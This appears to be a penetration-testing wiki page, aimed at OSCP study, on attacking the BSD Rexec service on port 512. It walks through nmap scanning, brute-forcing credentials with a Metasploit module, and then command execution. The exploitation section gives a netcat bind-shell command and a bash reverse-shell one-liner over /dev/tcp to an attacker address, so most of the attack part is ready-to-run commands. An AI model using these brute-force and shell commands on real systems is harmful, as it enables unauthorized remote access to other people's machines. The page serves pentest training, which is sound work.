# Rexec - Port 512

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic Info <a href="#basic-information" id="basic-information"></a>

Rexec (remote exec) is one of the BSD r-services. It **allows you to execute a command inside a host** if you know valid **credentials** (username and password); both are sent over the network in clear text.

**Default Port:** 512

```
PORT    STATE SERVICE
512/tcp open  exec
```

## Scanning for Hosts

Start by using Nmap to scan for hosts with port 512 open, which is the default port for Rexec:

```
nmap -sT -p 512 <target_ip_range>
```

This will help identify potential targets with the Rexec service running.

## Brute-Forcing Credentials

Use Metasploit's `auxiliary/scanner/rservices/rexec_login` module to brute-force username and password combinations:

Load the module:

```
use auxiliary/scanner/rservices/rexec_login
```

Set the target and options, such as username and password files:

```
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
```

This will try each username and password combination until one is accepted; because Rexec sends the password in clear text, those same credentials are also readable by anyone capturing traffic to port 512.

## Exploiting with Command Execution

Once credentials are obtained, use the rexec command to execute a backdoor command. For example, start a netcat listener:

```
rexec -l username -p password rhost "nc -l -p 1234 -e /bin/bash"
```

Then, connect to the backdoor listening on the target (a client connection, not a second listener):

```
nc -nv rhost 1234
```

Alternatively, set up a reverse shell:

```
rexec -l username -p password rhost "bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'"
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)

{% endhint %}
